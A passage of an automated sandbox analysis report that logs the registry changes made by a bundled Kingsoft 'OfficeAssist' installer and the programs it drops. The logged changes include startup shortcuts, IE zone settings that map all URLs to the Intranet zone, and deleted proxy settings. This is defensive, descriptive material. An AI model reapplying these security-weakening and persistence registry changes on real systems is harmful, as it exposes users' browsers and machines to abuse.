\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\2.jpg, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\25.png, , \??\C:\DOCUME~1\adm0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process OfficeAssist.0195.80.1015.exe:448 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Kingsoft\WpsAssist\Common]
"Version" = "1.0.0.0195"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Kingsoft\WpsAssist\Common]
"infoGUID" = "{96D8A049-9608-479F-9CD4-9401117A35B9}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\WpsAssist]
"DisplayName" = "文档美化大师"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Documents and Settings%\%current user%\Local Settings\Application Data\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Start Menu\Programs\Startup\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Local Settings\Application Data\速捷搜索.lnk, \??\%Documents and Settings%\%current user%\Start Menu\Programs\Startup\速捷搜索.lnk, \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\wpsassist\~8c84a\install_res\1.png,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\WpsAssist]
"DisplayVersion" = "1.0.0.0195"
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\utility\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\TypeLib]
"Version" = "2.5"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist]
"assistupdate.exe" = "Assistant Expansion tool"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\WpsAssist]
"LocationRoot" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Kingsoft\WpsAssist\Common]
"DistSrc" = "80.1015"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\WpsAssist]
"Publisher" = "Kingsoft Corp."

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC A9 D8 22 C5 51 D1 AA B8 89 33 42 3A 77 B9 4D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.5\HELPDIR]
"(Default)" = "%Program Files%\Common Files\Microsoft Shared\OFFICE14"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\WpsAssist]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\utility\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted\%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp]
"OfficeAssist.0195.80.1015.exe" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\TypeLib]
"(Default)" = "{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process fm4svr.exe:3608 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 2C 52 55 51 07 9F E7 67 93 09 8D 4C 2D 11 50"

The process fm4svr.exe:1392 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 F2 26 D3 49 52 82 40 FB CB A7 7B FA C1 CF E4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process fjwyusp.exe:1336 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fjwyusp]
"a-zm-157391-v5.exe" = "a-zm-157391-v5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fjwyusp]
"IFoxInstall-y-c203945859-run-s-x.exe" = "SHOnlineInstall Application"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fjwyusp]
"xkcc_50091167828.exe" = "安装文件"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fjwyusp]
"axult.exe" = "axult"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 04 73 F2 EC 13 C6 CE 4E B0 BE 25 1D A7 94 17"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fjwyusp]
"setup_2948-140896.exe" = "FM4.0安装程序"
"axuls.exe" = "axuls"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process axuls.exe:1160 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 C0 62 B1 41 4C EF E0 B6 C3 69 69 AF F8 01 81"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Dropped modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ignite.exe:2576 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 40 3B 45 63 A0 34 86 04 D9 A6 99 93 92 E9 A6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Dropped deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ignite.exe:2880 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA E9 04 92 BE 57 E4 23 7D 44 4B 41 73 A5 45 90"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%System%\config\systemprofile\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%System%\config\systemprofile\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files"

The process ignite.exe:2764 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 92 71 BB 4F C3 9F 7D 2F 02 55 E3 09 44 22 8A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

